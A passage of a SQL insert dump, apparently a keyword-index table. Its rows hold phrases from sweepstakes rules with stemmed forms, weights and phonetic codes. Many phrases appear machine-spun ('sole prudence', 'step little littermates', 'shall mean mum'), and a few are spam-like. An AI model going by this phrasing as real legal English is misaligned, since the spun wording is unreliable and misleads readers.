in',0,1,1.2667,'R425',1,'en'),(28475,'rules in addition','rule in addition',0,1,1.5667,'R42535',1,'en'),(28476,'rules or','rule or',0,1,1.2667,'R426',1,'en'),(28477,'rules or prior','rule or prior',0,1,1.4667,'R42616',1,'en'),(28478,'rules or the','rule or the',0,1,1.4,'R4263',1,'en'),(28479,'rules shall','rule shall',0,1,1.3667,'R424',1,'en'),(28480,'rules shall be','rule shall be',0,1,1.4667,'R4241',1,'en'),(28481,'rules whether','rule whether',0,1,1.4333,'R4236',1,'en'),(28482,'rules whether of','rule whether of',0,1,1.5333,'R42361',1,'en'),(28483,'rules y','rule y',0,1,1.2333,'R420',1,'en'),(28484,'rules y simply','rule y simply',0,1,1.4667,'R42514',1,'en'),(28485,'s a','s a',0,1,1.1,'S000',1,'en'),(28486,'s a new','s a new',0,1,1.2333,'S500',1,'en'),(28487,'s cannot','s cannot',0,1,1.2667,'S530',1,'en'),(28488,'s cannot be','s cannot be',0,1,1.3667,'S531',1,'en'),(28489,'s from','s from',0,1,1.2,'S165',1,'en'),(28490,'s from among','s from among',0,1,1.4,'S1652',1,'en'),(28491,'s is','s is',0,1,1.1333,'S000',1,'en'),(28492,'s is submitted','s is submitted',0,1,1.4667,'S153',1,'en'),(28493,'s to','s to',0,1,1.1333,'S300',1,'en'),(28494,'s to award','s to award',0,1,1.3333,'S363',1,'en'),(28495,'s using','s using',0,1,1.2333,'S520',1,'en'),(28496,'s using all','s using all',0,1,1.3667,'S524',1,'en'),(28497,'s will','s will',0,1,1.2,'S400',1,'en'),(28498,'s will sign','s will sign',0,1,1.3667,'S425',1,'en'),(28499,'said courts','said courts',0,1,1.3667,'S32632',1,'en'),(28500,'said courts and','said courts and',0,1,1.5,'S3263253',1,'en'),(28501,'sales','sale',0,0,0.3333,'S420',2,'en'),(28502,'sales agents','sale agents',0,1,1.4,'S42532',1,'en'),(28503,'sales agents officers','sale agents officers',0,1,1.7,'S425321262',1,'en'),(28504,'sales place','sale place',0,1,1.3667,'S42142',1,'en'),(28505,'sales place a','sale place a',0,1,1.4333,'S42142',1,'en'),(28506,'same person','same person',0,1,1.3667,'S51625',1,'en'),(28507,'same person over','same person over',0,1,1.5333,'S5162516',1,'en'),(28508,'same residence','same residence',0,1,1.4667,'S562352',1,'en'),(28509,'same residence at','same residence at',0,1,1.5667,'S5623523',1,'en'),(28510,'select','select',0,0,0.4,'S423',1,'en'),(28511,'select winner','select winner',0,1,1.4333,'S42356',1,'en'),(28512,'select winner s','select winner s',0,1,1.5,'S423562',1,'en'),(28513,'selected at','select at',0,1,1.3667,'S423',1,'en'),(28514,'selected at sponsor\'s','select at sponsor',0,1,1.7,'S423215262',1,'en'),(28515,'selection','select',0,0,0.6,'S4235',2,'en'),(28516,'selection is','select is',0,1,1.4,'S42352',1,'en'),(28517,'selection is under','select is under',0,1,1.6,'S42352536',1,'en'),(28518,'send to','send to',0,1,1.2333,'S530',1,'en'),(28519,'send to potential','send to potential',0,1,1.5667,'S5313534',1,'en'),(28520,'sent an','sent an',0,1,1.2333,'S535',1,'en'),(28521,'sent an irs','sent an irs',0,1,1.3667,'S53562',1,'en'),(28522,'sent or','sent or',0,1,1.2333,'S536',1,'en'),(28523,'sent or another','sent or another',0,1,1.5,'S536536',1,'en'),(28524,'sent the','sent the',0,1,1.2667,'S530',1,'en'),(28525,'sent the affidavit','sent the affidavit',0,1,1.6,'S531313',1,'en'),(28526,'services for','servic for',0,1,1.4,'S61216',1,'en'),(28527,'services for sponsor','servic for sponsor',0,1,1.6667,'S6121621526',1,'en'),(28528,'set airwaves','set airwaves',0,1,1.4,'S3612',1,'en'),(28529,'set airwaves cable','set airwaves cable',0,1,1.6,'S361214',1,'en'),(28530,'several weeks','sever weeks',0,1,1.4333,'S1642',1,'en'),(28531,'several weeks a','sever weeks a',0,1,1.5,'S1642',1,'en'),(28532,'shall','shall',0,0,0.3333,'S400',1,'en'),(28533,'shall be','shall be',0,1,1.2667,'S410',1,'en'),(28534,'shall be binding','shall be binding',0,1,1.5333,'S415352',1,'en'),(28535,'shall be brought','shall be brought',0,1,1.5333,'S41623',1,'en'),(28536,'shall be disqualified','shall be disqualified',0,1,1.7,'S4132413',1,'en'),(28537,'shall have','shall have',0,1,1.3333,'S410',1,'en'),(28538,'shall have no','shall have no',0,1,1.4333,'S415',1,'en'),(28539,'shall mean','shall mean',0,1,1.3333,'S450',1,'en'),(28540,'shall mean mum','shall mean mum',0,1,1.4667,'S450',1,'en'),(28541,'shall mean people','shall mean people',0,1,1.5667,'S4514',1,'en'),(28542,'shall not','shall not',0,1,1.3,'S453',1,'en'),(28543,'shall not have','shall not have',0,1,1.4667,'S4531',1,'en'),(28544,'share the','share the',0,1,1.3,'S630',1,'en'),(28545,'share the same','share the same',0,1,1.4667,'S6325',1,'en'),(28546,'sharing','share',0,0,0.4667,'S652',1,'en'),(28547,'sharing their','share their',0,1,1.4333,'S65236',1,'en'),(28548,'sharing their info','share their info',0,1,1.6,'S6523651',1,'en'),(28549,'she enters','she enters',0,1,1.3333,'S5362',1,'en'),(28550,'she enters the','she enters the',0,1,1.4667,'S53623',1,'en'),(28551,'shock','shock',0,0,0.3333,'S000',2,'en'),(28552,'shock cost','shock cost',0,1,1.3333,'S300',1,'en'),(28553,'shock cost or','shock cost or',0,1,1.4333,'S360',1,'en'),(28554,'sign are','sign are',0,1,1.2667,'S560',1,'en'),(28555,'sign are blessed','sign are blessed',0,1,1.5333,'S561423',1,'en'),(28556,'sign have','sign have',0,1,1.3,'S510',1,'en'),(28557,'sign have notarized','sign have notarized',0,1,1.6333,'S5153623',1,'en'),(28558,'signed','sign',0,0,0.4,'S530',1,'en'),(28559,'signed give','sign give',0,1,1.3667,'S5321',1,'en'),(28560,'signed give off','sign give off',0,1,1.5,'S5321',1,'en'),(28561,'similar event','similar event',0,1,1.4333,'S546153',1,'en'),(28562,'similar event beyond','similar event beyond',0,1,1.6667,'S546153153',1,'en'),(28563,'simply by entering','simpli by entering',0,1,1.6,'S514153652',1,'en'),(28564,'simply entries','simpli entries',0,1,1.4667,'S5145362',1,'en'),(28565,'simply entries entry','simpli entries entry',0,1,1.6667,'S5145362536',1,'en'),(28566,'since entire','sinc entire',0,1,1.4,'S52536',1,'en'),(28567,'since entire sweepstakes','sinc entire sweepstakes',0,1,1.8,'S5253621232',1,'en'),(28568,'sisters','sister',0,0,0.4667,'S362',1,'en'),(28569,'sisters or','sister or',0,1,1.3333,'S3626',1,'en'),(28570,'sisters or partners','sister or partners',0,1,1.6333,'S3626163562',1,'en'),(28571,'sites','site',0,0,0.3333,'S320',1,'en'),(28572,'sites loved','site loved',0,1,1.3667,'S32413',1,'en'),(28573,'sites loved ones','site loved ones',0,1,1.5333,'S3241352',1,'en'),(28574,'sites promoting','site promoting',0,1,1.5,'S32165352',1,'en'),(28575,'sites promoting the','site promoting the',0,1,1.6333,'S321653523',1,'en'),(28576,'skill','skill',0,0,0.3333,'S400',1,'en'),(28577,'skill testing','skill testing',0,1,1.4333,'S432352',1,'en'),(28578,'skill testing question','skill testing question',0,1,1.7333,'S43235235',1,'en'),(28579,'so that you','so that you',0,1,1.3667,'S300',1,'en'),(28580,'software creator','softwar creator',0,1,1.5333,'S1362636',1,'en'),(28581,'software creator of','softwar creator of',0,1,1.6333,'S13626361',1,'en'),(28582,'software in','softwar in',0,1,1.3667,'S1365',1,'en'),(28583,'software in association','softwar in association',0,1,1.7667,'S1365235',1,'en'),(28584,'software program','softwar program',0,1,1.5333,'S13616265',1,'en'),(28585,'software program do','softwar program do',0,1,1.6333,'S136162653',1,'en'),(28586,'sole','sole',0,0,0.2667,'S400',2,'en'),(28587,'sole acumen','sole acumen',0,1,1.3667,'S425',1,'en'),(28588,'sole acumen to','sole acumen to',0,1,1.4667,'S4253',1,'en'),(28589,'sole dependability','sole dependability',0,1,1.6,'S43153143',1,'en'),(28590,'sole dependability to','sole dependability to',0,1,1.7,'S43153143',1,'en'),(28591,'sole duty','sole duty',0,1,1.3,'S430',1,'en'),(28592,'sole duty of','sole duty of',0,1,1.4,'S431',1,'en'),(28593,'sole foresight','sole foresight',0,1,1.4667,'S41623',1,'en'),(28594,'sole foresight to','sole foresight to',0,1,1.5667,'S41623',1,'en'),(28595,'sole prudence','sole prudence',0,1,1.4333,'S416352',1,'en'),(28596,'sole prudence from','sole prudence from',0,1,1.6,'S416352165',1,'en'),(28597,'sole prudence that','sole prudence that',0,1,1.6,'S4163523',1,'en'),(28598,'solely','sole',0,0,0.4,'S400',1,'en'),(28599,'solely the','sole the',0,1,1.3333,'S430',1,'en'),(28600,'solely the winner\'s','sole the winner',0,1,1.6333,'S43562',1,'en'),(28601,'solely with','sole with',0,1,1.3667,'S430',1,'en'),(28602,'solely with the','sole with the',0,1,1.5,'S430',1,'en'),(28603,'solutions subsidiaries','solut subsidiaries',0,1,1.7333,'S435212362',1,'en'),(28604,'solutions subsidiaries web','solut subsidiaries web',0,1,1.8667,'S4352123621',1,'en'),(28605,'solutions successors','solut successors',0,1,1.6667,'S435262',1,'en'),(28606,'solutions successors assigns','solut successors assigns',0,1,1.9333,'S43526252',1,'en'),(28607,'someone it','someon it',0,1,1.3333,'S530',1,'en'),(28608,'someone it finds','someon it finds',0,1,1.5333,'S531532',1,'en'),(28609,'sort','sort',0,0,0.2667,'S630',4,'en'),(28610,'sort g','sort g',0,1,1.2,'S632',1,'en'),(28611,'sort g entrants','sort g entrants',0,1,1.5,'S632536532',1,'en'),(28612,'speak','speak',0,0,0.3333,'S120',1,'en'),(28613,'speak customer','speak customer',0,1,1.4667,'S12356',1,'en'),(28614,'speak customer reviews','speak customer reviews',0,1,1.7333,'S1235612',1,'en'),(28615,'special promoting','special promoting',0,1,1.5667,'S124165352',1,'en'),(28616,'special promoting and','special promoting and',0,1,1.7,'S12416535253',1,'en'),(28617,'specialists','specialist',0,0,0.7333,'S124232',1,'en'),(28618,'specialists brokers','specialist brokers',0,1,1.6333,'S12423216262',1,'en'),(28619,'specialists brokers successors','specialist brokers successors',0,1,2,'S1242321626262',1,'en'),(28620,'specifically','specif',0,0,0.8,'S12124',1,'en'),(28621,'specifically listed','specif listed',0,1,1.6333,'S1212423',1,'en'),(28622,'specifically listed herein','specif listed herein',0,1,1.8667,'S121242365',1,'en'),(28623,'sponsor','sponsor',0,0,0.4667,'S1526',1,'en'),(28624,'sponsor a','sponsor a',0,1,1.3,'S1526',1,'en'),(28625,'sponsor and','sponsor and',0,1,1.3667,'S152653',1,'en'),(28626,'sponsor and also','sponsor and also',0,1,1.5333,'S15265342',1,'en'),(28627,'sponsor and its','sponsor and its',0,1,1.5,'S1526532',1,'en'),(28628,'sponsor by','sponsor by',0,1,1.3333,'S15261',1,'en'),(28629,'sponsor by postal','sponsor by postal',0,1,1.5667,'S15261234',1,'en'),(28630,'sponsor finds','sponsor finds',0,1,1.4333,'S15261532',1,'en'),(28631,'sponsor finds in','sponsor finds in',0,1,1.5333,'S152615325',1,'en'),(28632,'sponsor has','sponsor has',0,1,1.3667,'S15262',1,'en'),(28633,'sponsor has neither','sponsor has neither',0,1,1.6333,'S15262536',1,'en'),(28634,'sponsor in','sponsor in',0,1,1.3333,'S15265',1,'en'),(28635,'sponsor in almost','sponsor in almost',0,1,1.5667,'S152654523',1,'en'),(28636,'sponsor information','sponsor information',0,1,1.6333,'S1526516535',1,'en'),(28637,'sponsor information collected','sponsor information collected',0,1,1.9667,'S15265165352423',1,'en'),(28638,'sponsor is','sponsor is',0,1,1.3333,'S15262',1,'en'),(28639,'sponsor is not','sponsor is not',0,1,1.4667,'S1526253',1,'en'),(28640,'sponsor of','sponsor of',0,1,1.3333,'S15261',1,'en'),(28641,'sponsor of the','sponsor of the',0,1,1.4667,'S152613',1,'en'),(28642,'sponsor or','sponsor or',0,1,1.3333,'S1526',1,'en'),(28643,'sponsor or its','sponsor or its',0,1,1.4667,'S152632',1,'en'),(28644,'sponsor policy','sponsor policy',0,1,1.4667,'S1526142',1,'en'),(28645,'sponsor policy all','sponsor policy all',0,1,1.6,'S15261424',1,'en'),(28646,'sponsor privacy','sponsor privacy',0,1,1.5,'S15261612',1,'en'),(28647,'sponsor privacy policy','sponsor privacy policy',0,1,1.7333,'S15261612142',1,'en'),(28648,'sponsor reasonable','sponsor reasonable',0,1,1.6,'S15262514',1,'en'),(28649,'sponsor reasonable control','sponsor reasonable control',0,1,1.8667,'S1526251425364',1,'en'),(28650,'sponsor regarding','sponsor regarding',0,1,1.5667,'S152626352',1,'en'),(28651,'sponsor regarding the','sponsor regarding the',0,1,1.7,'S1526263523',1,'en'),(28652,'sponsor requires','sponsor requires',0,1,1.5333,'S1526262',1,'en'),(28653,'sponsor requires a','sponsor requires a',0,1,1.6,'S1526262',1,'en'),(28654,'sponsor requires within','sponsor requires within',0,1,1.7667,'S152626235',1,'en'),(28655,'sponsor reserves','sponsor reserves',0,1,1.5333,'S15262612',1,'en'),(28656,'sponsor reserves an','sponsor reserves an',0,1,1.6333,'S152626125',1,'en'),(28657,'sponsor reserves the','sponsor reserves the',0,1,1.6667,'S152626123',1,'en'),(28658,'sponsor sent','sponsor sent',0,1,1.4,'S1526253',1,'en'),(28659,'sponsor sent the','sponsor sent the',0,1,1.5333,'S1526253',1,'en'),(28660,'sponsor sponsor','sponsor sponsor',0,1,1.5,'S152621526',1,'en'),(28661,'sponsor sponsor is','sponsor sponsor is',0,1,1.6,'S1526215262',1,'en'),(28662,'sponsor the','sponsor the',0,1,1.3667,'S15263',1,'en'),(28663,'sponsor the affidavit','sponsor the affidavit',0,1,1.7,'S152631313',1,'en'),(28664,'sponsor to','sponsor to',0,1,1.3333,'S15263',1,'en'),(28665,'sponsor to use','sponsor to use',0,1,1.4667,'S152632',1,'en'),(28666,'sponsor upon','sponsor upon',0,1,1.4,'S152615',1,'en'),(28667,'sponsor upon receipt','sponsor upon receipt',0,1,1.6667,'S1526156213',1,'en'),(28668,'sponsor uses','sponsor uses',0,1,1.4,'S15262',1,'en'),(28669,'sponsor uses reasonable','sponsor uses reasonable',0,1,1.7667,'S1526262514',1,'en'),(28670,'sponsor whose','sponsor whose',0,1,1.4333,'S15262',1,'en'),(28671,'sponsor whose activities','sponsor whose activities',0,1,1.8,'S152623132',1,'en'),(28672,'sponsor whose preferences','sponsor whose preferences',0,1,1.8333,'S15262161652',1,'en'),(28673,'sponsor will','sponsor will',0,1,1.4,'S15264',1,'en'),(28674,'sponsor will be','sponsor will be',0,1,1.5,'S152641',1,'en'),(28675,'sponsor will randomly','sponsor will randomly',0,1,1.7,'S1526465354',1,'en'),(28676,'sponsor will send','sponsor will send',0,1,1.5667,'S15264253',1,'en'),(28677,'sponsor worldwide','sponsor worldwide',0,1,1.5667,'S152643',1,'en'),(28678,'sponsor worldwide and','sponsor worldwide and',0,1,1.7,'S15264353',1,'en'),(28679,'sponsor\'s','sponsor',0,0,0.6,'S15262',1,'en'),(28680,'sponsor\'s sole','sponsor sole',0,1,1.4667,'S152624',1,'en'),(28681,'sponsor\'s sole prudence','sponsor sole prudence',0,1,1.7667,'S15262416352',1,'en'),(28682,'sposnor','sposnor',0,0,0.4667,'S1256',1,'en'),(28683,'sposnor privacy','sposnor privacy',0,1,1.5,'S12561612',1,'en'),(28684,'sposnor privacy policy','sposnor privacy policy',0,1,1.7333,'S12561612142',1,'en'),(28685,'spotlight','spotlight',0,0,0.6,'S13423',1,'en'),(28686,'spotlight release','spotlight release',0,1,1.5667,'S13423642',1,'en'),(28687,'spotlight release unless','spotlight release unless',0,1,1.8,'S13423642542',1,'en'),(28688,'start date','start date',0,1,1.3333,'S363',1,'en'),(28689,'start date of','start date of',0,1,1.4333,'S3631',1,'en'),(28690,'state and','state and',0,1,1.3,'S353',1,'en'),(28691,'state and local','state and local',0,1,1.5,'S353424',1,'en'),(28692,'state of residence','state of residence',0,1,1.6,'S3162352',1,'en'),(28693,'state or','state or',0,1,1.2667,'S360',1,'en'),(28694,'state or federal','state or federal',0,1,1.5333,'S361364',1,'en'),(28695,'state or territory','state or territory',0,1,1.6,'S363636',1,'en'),(28696,'state rules','state rules',0,1,1.3667,'S3642',1,'en'),(28697,'state rules and','state rules and',0,1,1.5,'S364253',1,'en'),(28698,'state rules at','state rules at',0,1,1.4667,'S36423',1,'en'),(28699,'state rules in','state rules in',0,1,1.4667,'S36425',1,'en'),(28700,'state state','state state',0,1,1.3667,'S323',1,'en'),(28701,'state state or','state state or',0,1,1.4667,'S3236',1,'en'),(28702,'stated','state',0,0,0.4,'S300',1,'en'),(28703,'stated below','state below',0,1,1.4,'S314',1,'en'),(28704,'stated below to','state below to',0,1,1.5,'S3143',1,'en'),(28705,'stated herein','state herein',0,1,1.4333,'S365',1,'en'),(28706,'stated herein will','state herein will',0,1,1.6,'S3654',1,'en'),(28707,'stated in','state in',0,1,1.3,'S350',1,'en'),(28708,'stated in the','state in the',0,1,1.4333,'S353',1,'en'),(28709,'statements','statement',0,0,0.6667,'S3532',1,'en'),(28710,'statements made','statement made',0,1,1.5,'S353253',1,'en'),(28711,'statements made by','statement made by',0,1,1.6,'S3532531',1,'en'),(28712,'std','std',0,0,0.2,'S300',1,'en'),(28713,'std pictures','std pictures',0,1,1.4,'S312362',1,'en'),(28714,'std pictures speak','std pictures speak',0,1,1.6,'S31236212',1,'en'),(28715,'step brothers','step brothers',0,1,1.4333,'S316362',1,'en'),(28716,'step brothers and','step brothers and',0,1,1.5667,'S31636253',1,'en'),(28717,'step little','step little',0,1,1.3667,'S31434',1,'en'),(28718,'step little littermates','step little littermates',0,1,1.7667,'S3143436532',1,'en'),(28719,'step modern','step modern',0,1,1.3667,'S315365',1,'en'),(28720,'step modern families','step modern families',0,1,1.6667,'S3153651542',1,'en'),(28721,'stevegriffin','stevegriffin',0,0,0.8,'S312615',1,'en'),(28722,'stevegriffin style','stevegriffin style',0,1,1.6,'S312615234',1,'en'),(28723,'stevegriffin style contest','stevegriffin style contest',0,1,1.8667,'S31261523425323',1,'en'),(28724,'stolen','stolen',0,0,0.4,'S345',2,'en'),(28725,'stolen american','stolen american',0,1,1.5,'S345625',1,'en'),(28726,'stolen american express','stolen american express',0,1,1.7667,'S3456252162',1,'en'),(28727,'stops','stop',0,0,0.3333,'S312',1,'en'),(28728,'stops ban','stop ban',0,1,1.3,'S31215',1,'en'),(28729,'stops ban reparation','stop ban reparation',0,1,1.6667,'S3121561635',1,'en'),(28730,'style contest','style contest',0,1,1.4333,'S3425323',1,'en'),(28731,'style contest purchase','style contest purchase',0,1,1.7333,'S3425323162',1,'en'),(28732,'style contest rodale','style contest rodale',0,1,1.6667,'S3425323634',1,'en'),(28733,'subject','subject',0,0,0.4667,'S123',1,'en'),(28734,'subject matter','subject matter',0,1,1.4667,'S123536',1,'en'),(28735,'subject matter located','subject matter located',0,1,1.7333,'S123536423',1,'en'),(28736,'subject to','subject to',0,1,1.3333,'S123',1,'en'),(28737,'subject to any','subject to any',0,1,1.4667,'S1235',1,'en'),(28738,'subjection','subject',0,0,0.6667,'S1235',1,'en'),(28739,'subjection release','subject release',0,1,1.6,'S1235642',1,'en'),(28740,'subjection release unless','subject release unless',0,1,1.8333,'S1235642542',1,'en'),(28741,'submit','submit',0,0,0.4,'S153',1,'en'),(28742,'submit entries','submit entries',0,1,1.4667,'S1535362',1,'en'),(28743,'submit entries if','submit entries if',0,1,1.5667,'S15353621',1,'en'),(28744,'submitted','submit',0,0,0.6,'S153',2,'en'),(28745,'submitted to','submit to',0,1,1.4,'S153',2,'en'),(28746,'submitted to sponsor','submit to sponsor',0,1,1.6667,'S15321526',1,'en'),(28747,'subsequently','subsequ',0,0,0.8,'S12534',1,'en'),(28748,'subsequently opt','subsequ opt',0,1,1.5333,'S1253413',1,'en'),(28749,'subsequently opt out','subsequ opt out',0,1,1.6667,'S1253413',1,'en'),(28750,'subsidiaries','subsidiari',0,0,0.8,'S12362',1,'en'),(28751,'subsidiaries affiliate','subsidiari affiliate',0,1,1.7333,'S12362143',1,'en'),(28752,'subsidiaries affiliate web','subsidiari affiliate web',0,1,1.8667,'S123621431',1,'en'),(28753,'subsidiaries affiliates','subsidiari affiliates',0,1,1.7667,'S123621432',1,'en'),(28754,'subsidiaries affiliates and','subsidiari affiliates and',0,1,1.9,'S12362143253',1,'en'),(28755,'subsidiaries associates','subsidiari associates',0,1,1.7667,'S1236232',1,'en'),(28756,'subsidiaries associates allies','subsidiari associates allies',0,1,2,'S123623242',1,'en'),(28757,'subsidiaries web','subsidiari web',0,1,1.5333,'S123621',1,'en'),(28758,'subsidiaries web marketers','subsidiari web marketers',0,1,1.8667,'S123621562362',1,'en'),(28759,'substituted','substitut',0,0,0.7333,'S123',1,'en'),(28760,'substituted 6.marketing','substitut 6.marketing',0,1,1.7667,'S123562352',1,'en'),(28761,'substituted 6.marketing release','substitut 6.marketing release',0,1,2,'S123562352642',1,'en'),(28762,'successor','successor',0,0,0.6,'S600',1,'en'),(28763,'successor companies','successor companies',0,1,1.6333,'S625152',1,'en'),(28764,'successor companies or','successor companies or',0,1,1.7333,'S6251526',1,'en'),(28765,'successors','successor',0,0,0.6667,'S620',1,'en'),(28766,'successors assigns','successor assigns',0,1,1.6,'S6252',1,'en'),(28767,'successors assigns persons','successor assigns persons',0,1,1.8667,'S625216252',1,'en'),(28768,'successors assigns sales','successor assigns sales',0,1,1.8,'S625242',1,'en'),(28769,'successors assigns workforce','successor assigns workforce',0,1,1.9333,'S625262162',1,'en'),(28770,'such as but','such as but',0,1,1.3667,'S130',1,'en'),(28771,'such individuals','such individuals',0,1,1.5333,'S531342',1,'en'),(28772,'such individuals are','such individuals are',0,1,1.6667,'S5313426',1,'en'),(28773,'such person','such person',0,1,1.3667,'S1625',1,'en'),(28774,'such person s','such person s',0,1,1.4333,'S16252',1,'en'),(28775,'supplement','supplement',0,0,0.6667,'S1453',1,'en'),(28776,'supplement delivery','supplement delivery',0,1,1.6333,'S1453416',1,'en'),(28777,'supplement delivery by','supplement delivery by',0,1,1.7333,'S14534161',1,'en'),(28778,'supplying','suppli',0,0,0.6,'S1452',1,'en'),(28779,'supplying any','suppli any',0,1,1.4333,'S14525',1,'en'),(28780,'supplying any prize','suppli any prize',0,1,1.6333,'S14525162',1,'en'),(28781,'sure express','sure express',0,1,1.4,'S62162',1,'en'),(28782,'sure express or','sure express or',0,1,1.5,'S621626',1,'en'),(28783,'sweepstakes','sweepstak',0,0,0.7333,'S1232',1,'en'),(28784,'sweepstakes and','sweepstak and',0,1,1.5,'S123253',1,'en'),(28785,'sweepstakes and an','sweepstak and an',0,1,1.6,'S1232535',1,'en'),(28786,'sweepstakes and awarding','sweepstak and awarding',0,1,1.8,'S1232536352',1,'en'),(28787,'sweepstakes entrants','sweepstak entrants',0,1,1.6667,'S1232536532',1,'en'),(28788,'sweepstakes entrants and','sweepstak entrants and',0,1,1.8,'S123253653253',1,'en'),(28789,'sweepstakes et','sweepstak et',0,1,1.4667,'S12323',1,'en'),(28790,'sweepstakes et july','sweepstak et july',0,1,1.6333,'S1232324',1,'en'),(28791,'sweepstakes multiple','sweepstak multiple',0,1,1.6667,'S123254314',1,'en'),(28792,'sweepstakes multiple times','sweepstak multiple times',0,1,1.8667,'S123254314352',1,'en'),(28793,'sweepstakes or','sweepstak or',0,1,1.4667,'S12326',1,'en'),(28794,'sweepstakes or claiming','sweepstak or claiming',0,1,1.7667,'S123262452',1,'en'),(28795,'sweepstakes or sponsor','sweepstak or sponsor',0,1,1.7333,'S1232621526',1,'en'),(28796,'sweepstakes portrayed','sweepstak portrayed',0,1,1.7,'S123216363',1,'en'),(28797,'sweepstakes portrayed services','sweepstak portrayed services',0,1,2,'S1232163632612',1,'en'),(28798,'sweepstakes promotion','sweepstak promotion',0,1,1.7,'S123216535',1,'en'),(28799,'sweepstakes promotion and','sweepstak promotion and',0,1,1.8333,'S1232165353',1,'en'),(28800,'sweepstakes promotion since','sweepstak promotion since',0,1,1.9,'S123216535252',1,'en'),(28801,'sweepstakes related','sweepstak related',0,1,1.6333,'S1232643',1,'en'),(28802,'sweepstakes related activity','sweepstak related activity',0,1,1.9333,'S12326432313',1,'en'),(28803,'sweepstakes sponsor','sweepstak sponsor',0,1,1.6333,'S12321526',1,'en'),(28804,'sweepstakes sponsor reserves','sweepstak sponsor reserves',0,1,1.9333,'S123215262612',1,'en'),(28805,'sweepstakes will','sweepstak will',0,1,1.5333,'S12324',1,'en'),(28806,'sweepstakes will likely','sweepstak will likely',0,1,1.7667,'S1232424',1,'en'),(28807,'take note','take note',0,1,1.3,'T253',1,'en'),(28808,'take note of','take note of',0,1,1.4,'T2531',1,'en'),(28809,'taking sponsor','take sponsor',0,1,1.4667,'T2521526',1,'en'),(28810,'taking sponsor will','take sponsor will',0,1,1.6333,'T25215264',1,'en'),(28811,'tampering','tamper',0,0,0.6,'T51652',1,'en'),(28812,'tampering in','tamper in',0,1,1.4,'T516525',1,'en'),(28813,'tampering in order','tamper in order',0,1,1.6,'T516525636',1,'en'),(28814,'tampering with','tamper with',0,1,1.4667,'T516523',1,'en'),(28815,'tampering with the','tamper with the',0,1,1.6,'T516523',1,'en'),(28816,'task','task',0,0,0.2667,'T200',1,'en'),(28817,'task for','task for',0,1,1.2667,'T216',1,'en'),(28818,'task for any','task for any',0,1,1.4,'T2165',1,'en'),(28819,'tax','tax',0,0,0.2,'T200',1,'en'),(28820,'tax form','tax form',0,1,1.2667,'T2165',1,'en'),(28821,'tax form for','tax form for',0,1,1.4,'T216516',1,'en'),(28822,'tax refund','tax refund',0,1,1.3333,'T26153',1,'en'),(28823,'tax refund alternative','tax refund alternative',0,1,1.7333,'T26153436531',1,'en'),(28824,'taxes','tax',0,0,0.3333,'T200',1,'en'),(28825,'taxes on','tax on',0,1,1.2667,'T250',1,'en'),(28826,'taxes on the','tax on the',0,1,1.4,'T253',1,'en'),(28827,'technical error','technic error',0,1,1.5,'T25246',1,'en'),(28828,'technical error regardless','technic error regardless',0,1,1.8667,'T2524626342',1,'en'),(28829,'technical rigors','technic rigors',0,1,1.5333,'T25246262',1,'en'),(28830,'technical rigors or','technic rigors or',0,1,1.6333,'T252462626',1,'en'),(28831,'television','televis',0,0,0.6667,'T4125',1,'en'),(28832,'television for','televis for',0,1,1.4667,'T412516',1,'en'),(28833,'television for computer','televis for computer',0,1,1.7667,'T41251625136',1,'en'),(28834,'terminate','termin',0,0,0.6,'T653',1,'en'),(28835,'terminate the','termin the',0,1,1.4333,'T653',1,'en'),(28836,'terminate the appropriate','termin the appropriate',0,1,1.8333,'T65316163',1,'en'),(28837,'termination','termin',0,0,0.7333,'T6535',1,'en'),(28838,'termination delays','termin delays',0,1,1.6,'T6535342',1,'en'),(28839,'termination delays or','termin delays or',0,1,1.7,'T65353426',1,'en'),(28840,'terms','term',0,0,0.3333,'T652',1,'en'),(28841,'terms any','term any',0,1,1.3,'T6525',1,'en'),(28842,'terms any depictions','term any depictions',0,1,1.6667,'T6525312352',1,'en'),(28843,'terms that','term that',0,1,1.3333,'T6523',1,'en'),(28844,'terms that may','term that may',0,1,1.4667,'T65235',1,'en'),(28845,'territorial','territori',0,0,0.7333,'T6364',1,'en'),(28846,'territorial protocols','territori protocols',0,1,1.7,'T6364163242',1,'en'),(28847,'territorial protocols and','territori protocols and',0,1,1.8333,'T636416324253',1,'en'),(28848,'territory','territori',0,0,0.6,'T636',1,'en'),(28849,'territory of','territori of',0,1,1.4,'T6361',1,'en'),(28850,'territory of residence','territori of residence',0,1,1.7333,'T636162352',1,'en'),(28851,'terrorism','terror',0,0,0.6,'T625',1,'en'),(28852,'terrorism weather','terror weather',0,1,1.5667,'T62536',1,'en'),(28853,'terrorism weather or','terror weather or',0,1,1.6667,'T62536',1,'en'),(28854,'testimony','testimoni',0,0,0.6,'T235',1,'en'),(28855,'testimony or','testimoni or',0,1,1.4,'T2356',1,'en'),(28856,'testimony or criteria','testimoni or criteria',0,1,1.7,'T23562636',1,'en'),(28857,'testing','test',0,0,0.4667,'T2352',1,'en'),(28858,'testing question','test question',0,1,1.5333,'T235235',1,'en'),(28859,'testing question administered','test question administered',0,1,1.9667,'T235235352363',1,'en'),(28860,'than as','than as',0,1,1.2333,'T520',1,'en'),(28861,'than as provided','than as provided',0,1,1.5333,'T521613',1,'en'),(28862,'than july','than july',0,1,1.3,'T524',1,'en'),(28863,'than july 2','than july 2',0,1,1.3667,'T524',1,'en'),(28864,'than the','than the',0,1,1.2667,'T530',2,'en'),(28865,'than the commonwealth','than the commonwealth',0,1,1.7,'T532543',1,'en'),(28866,'that any','that any',0,1,1.2667,'T500',1,'en'),(28867,'that any liability','that any liability',0,1,1.6,'T54143',1,'en'),(28868,'that are','that are',0,1,1.2667,'T600',1,'en'),(28869,'that are lost','that are lost',0,1,1.4333,'T6423',1,'en'),(28870,'that contain','that contain',0,1,1.4,'T2535',1,'en'),(28871,'that contain any','that contain any',0,1,1.5333,'T2535',1,'en'),(28872,'that deems','that deems',0,1,1.3333,'T520',1,'en'),(28873,'that deems him','that deems him',0,1,1.4667,'T525',1,'en'),(28874,'that is familiar','that is familiar',0,1,1.5333,'T21546',1,'en'),(28875,'that is related','that is related',0,1,1.5,'T2643',1,'en'),(28876,'that may','that may',0,1,1.2667,'T500',1,'en'),(28877,'that may apply','that may apply',0,1,1.4667,'T514',1,'en'),(28878,'that sponsor','that sponsor',0,1,1.4,'T21526',1,'en'),(28879,'that sponsor has','that sponsor has',0,1,1.5333,'T215262',1,'en'),(28880,'that sponsor requires','that sponsor requires',0,1,1.7,'T21526262',1,'en'),(28881,'that sponsor reserves','that sponsor reserves',0,1,1.7,'T215262612',1,'en'),(28882,'that technical','that technical',0,1,1.4667,'T2524',1,'en'),(28883,'that technical rigors','that technical 